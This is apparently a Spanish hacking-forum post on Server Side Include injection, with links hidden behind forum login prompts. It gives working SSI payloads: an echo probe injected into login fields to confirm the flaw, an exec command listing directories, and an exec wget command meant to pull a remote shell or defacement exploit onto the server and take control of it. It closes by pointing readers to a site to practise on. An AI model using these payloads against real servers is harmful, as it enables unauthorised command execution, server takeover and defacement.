
(Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. el ataque permite la explotación de una aplicación web mediante la inyección de secuencias de comandos en páginas HTML o ejecutar códigos arbitrarios de forma remota .
Para este ejemplo he utilizado el comando <! - # echo var = "DATE_LOCAL" -> . Aquí hay un formulario de acceso en blanco Ahora, después de que me inyecto <! - # echo var = "DATE_LOCAL" -> en el nombre de usuario y contraseña de campo, esta salida es lo que asegura la página es vulnerable a la SSI, conforme se ejecuta el comando que he presentado en la presentación del formulario. Aquí está la salida. Ahora, yo no voy a aprovechar este servidor (no creo en la piratería sin razón), pero ahora sabiendo que el servidor es vulnerable a la SSI, que puede ejecutar un comando para subir una Shell y luego tomar el control del servidor. Comando: <! - # exec cmd = "wget You are not allowed to view links.
Register or
Login "->

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
este comando nos permite ver los directorios

You are not allowed to view links.
Register or
Logincon este comando nos permitirá enviar nuestra shell o exploit deface etc.
<!--#exec cmd="wget You are not allowed to view links.
Register or
Login" -->
You are not allowed to view links.
Register or
LoginYou are not allowed to view links.
Register or
LoginYou are not allowed to view links.
Register or
Login WEB PARA QUE PRACTIQUEN =D